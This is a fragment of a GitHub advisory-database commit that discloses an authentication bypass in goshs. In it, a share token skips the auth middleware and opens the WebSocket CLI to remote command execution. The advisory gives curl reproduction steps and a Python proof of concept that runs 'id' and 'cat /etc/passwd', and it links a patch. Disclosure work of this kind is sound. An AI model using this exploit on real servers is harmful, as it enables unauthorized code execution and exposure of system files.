+ "details": "### Summary\nWhen using the `Share Token` it is possible to bypass the limited selected file download with all the gosh functionalities, including code exec.\n\n### Details\n\nThe `BasicAuthMiddleware` checks for a `?token=` parameter **before** checking credentials. If the token exists in `SharedLinks`, the request passes through with **no auth check at all**. The handler then processes all query parameters — including `?ws` (WebSocket) which has higher priority than `?token`.\n\n```go\n// middleware.go:22-30 — token check runs FIRST\ntoken := r.URL.Query().Get(\"token\")\nif token != \"\" {\n _, ok := fs.SharedLinks[token]\n if ok {\n next.ServeHTTP(w, r) // Full auth bypass\n return\n }\n}\n// ... normal auth checks never reached\n```\n\nA share token is designed for **single-file, time-limited downloads**. But the middleware bypass grants access to everything — directory listing, file deletion, clipboard, WebSocket, and CLI command execution.\n\n\n**1. Create a webroot:**\n\n```bash\nmkdir -p /tmp/goshs-webroot\necho \"shareable file\" > /tmp/goshs-webroot/shareable.txt\n```\n\n**2. Start goshs with auth + TLS + CLI mode:**\n\n```bash\n/tmp/goshs-test -d /tmp/goshs-webroot -b 'admin:password' -s -ss -c -p 8000\n```\n\n> CLI mode requires auth (`-b`) and TLS (`-s -ss`). This is the documented usage — not a weakened config.\n\n**3. Verify authentication is required:**\n\n```bash\ncurl -sk https://localhost:8000/\nNot authorized\n```\n\n**4. As a legitimate user, create a share link:**\n\n```bash\ncurl -sk -u admin:password 'https://localhost:8000/shareable.txt?share'\n```\n\nResponse:\n```json\n{\"urls\":[\"https://127.0.0.1:8000/shareable.txt?token=gMP-w0hXRs-Q-FEZku63kA\"]}\n```\n\nSave the token value (e.g., `gMP-w0hXRs-Q-FEZku63kA`).\n\n**5. Prove the token bypasses auth for WebSocket:**\n\n```bash\n# Without token → 401 (blocked)\ncurl -sk -o /dev/null -w \"%{http_code}\" \\\n -H \"Connection: Upgrade\" -H \"Upgrade: websocket\" \\\n -H \"Sec-WebSocket-Version: 13\" -H \"Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\" \\\n 'https://localhost:8000/?ws'\n# 401\n\n# With token → 101 Switching Protocols (auth bypassed!)\ncurl -sk -o /dev/null -w \"%{http_code}\" \\\n -H \"Connection: Upgrade\" -H \"Upgrade: websocket\" \\\n -H \"Sec-WebSocket-Version: 13\" -H \"Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\" \\\n 'https://localhost:8000/?ws&token=gMP-w0hXRs-Q-FEZku63kA'\n# 101\n```\n\nFor a Full PoC, you can run the python file attached below, it will run `id` and `cat /etc/passwd`.\n\n\n\n\n### PoC\n\n``` python\nimport json, ssl, websocket\n\nTOKEN = \"gMP-w0hXRs-Q-FEZku63kA\" # ← replace with your token\n\nws = websocket.create_connection(\n f\"wss://localhost:8000/?ws&token={TOKEN}\",\n sslopt={\"cert_reqs\": ssl.CERT_NONE},\n)\nprint(\"[+] Connected WITHOUT credentials!\")\n\n# Execute 'id'\nws.send('{\"type\":\"command\",\"Content\":\"id\"}')\nimport time; time.sleep(1)\nresp = json.loads(ws.recv())\nprint(f\"Output: {resp['content']}\")\n# uid=501(youruser) gid=20(staff) ...\n\n# Execute 'cat /etc/passwd'\nws.send('{\"type\":\"command\",\"Content\":\"cat /etc/passwd\"}')\ntime.sleep(1)\nresp = json.loads(ws.recv())\nprint(f\"Output: {resp['content']}\")\n\nws.close()\n```\nA patch is available at https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2.",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments